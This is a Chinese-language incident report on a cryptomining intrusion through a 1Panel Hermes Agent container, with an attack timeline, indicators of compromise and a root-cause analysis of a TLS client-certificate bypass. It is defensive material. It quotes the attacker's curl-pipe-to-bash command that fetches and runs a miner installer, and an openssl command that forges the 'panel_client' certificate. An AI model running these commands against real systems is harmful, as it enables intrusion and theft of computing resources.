漏洞反馈归档:1Panel Hermes Agent 远程代码执行致挖矿入侵事件
一、事件概述
| 项目 | 内容 |
|---|---|
| 反馈日期 | 2026-07-20 |
| 反馈人 | 个人网站中心运维团队 |
| 涉及产品 | 1Panel Hermes Agent(1Panel 应用商店分发) |
| 受影响版本 |
1panel/hermes-agent:2026.6.19(镜像)、Hermes Agent < 0.16.0[reference:0][reference:1]、1Panel <= v2.0.5[reference:2][reference:3][reference:4] |
| 事件等级 | CRITICAL(严重) |
| CVE 关联 | CVE-2025-54424、CVE-2026-9366、CVE-2026-9368、CVE-2026-9369、CVE-2026-53870、GHSA-8j63-96wh-wh3j[reference:5] |
本反馈归档基于阿里云安全中心(SAS)2026年7月20日捕获的多条 CRITICAL 级别安全告警及 Incident 自动聚合分析(Incident UUID:
5129d4da81943c22ec1d7ee287248482)。
二、事件详情
2.1 攻击时间线
| 时间(2026-07-20) | 事件描述 |
|---|---|
| 09:30:07 | 攻击者通过 Hermes Agent 容器执行 /usr/bin/bash,加载 /tmp/hermes-snap-*.sh 临时脚本 |
| 09:30:12 | 容器内执行 curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | bash -s [钱包地址],下载并运行挖矿安装脚本 |
| 09:31:28 | 云安全中心触发「蠕虫病毒命令」告警(规则ID: 449),标记为 CRITICAL |
| 09:31:55 | XMRig 挖矿进程(PID: 853137)启动,路径 /opt/data/home/c3pool/xmrig
|
| 09:31:55 | 云安全中心触发「挖矿程序」告警,文件 SHA256: 98dafd1063...
|
| 09:32:18 | 云安全中心 AI 引擎将以上告警自动聚合为安全事件(Incident),确认主机已被成功入侵 |
2.2 入侵 IOC(威胁指标)
| 类别 | 指标 |
|---|---|
| 恶意容器 | c20111694051f73180627cf64f4fab60bf85643dd4de80d59098946c8cd60828 |
| 容器名称 | 1Panel-hermes-agent-PS6W |
| 恶意镜像 |
1panel/hermes-agent:2026.6.19(镜像ID: 1panel/hermes-agent@sha256:c380968a3e3a451268c172d8c800b98c857d3159aa7575cf73de3e31d0c3083b)[reference:6] |
| 恶意进程 |
/opt/data/home/c3pool/xmrig(PID: 853137) |
| 文件 SHA256 | 98dafd1063ff4b430ae105e3af415e7c273e864c7b6d60b7eb57723a81c6759b |
| 文件 MD5 | 8e8f75611768da032cf38c212f063ed6 |
| 下载域名 | download.c3pool.org |
| 恶意脚本 | setup_c3pool_miner.sh |
| 矿池钱包 | 45iaJGAyVfRVNJJFKbJEJ3FncQaxetu2iHHo2ttqNoJqcxiCNBazybZWgR2rgyos647SpEPRJT63o3Kcez7t5AHL24B2KGE |
三、漏洞根因分析
3.1 核心漏洞:1Panel Agent TLS 证书验证绕过(CVE-2025-54424)
1Panel v2.0.5 及以下版本中,Core 端与 Agent 端通过 HTTPS 通信时,Agent 端 TLS 认证策略设置为 tls.RequireAnyClientCert[reference:7][reference:8],仅要求客户端提供证书,但不验证证书签发 CA。应用层仅检查证书 CN 字段是否为 panel_client,未验证证书颁发者、有效期等关键信息[reference:9][reference:10]。
攻击者可通过自签名证书绕过 TLS 校验:
openssl req -x509 -newkey rsa:2048 -keyout panel_client.key -out panel_client.crt -days 365 -nodes -subj "/CN=panel_client"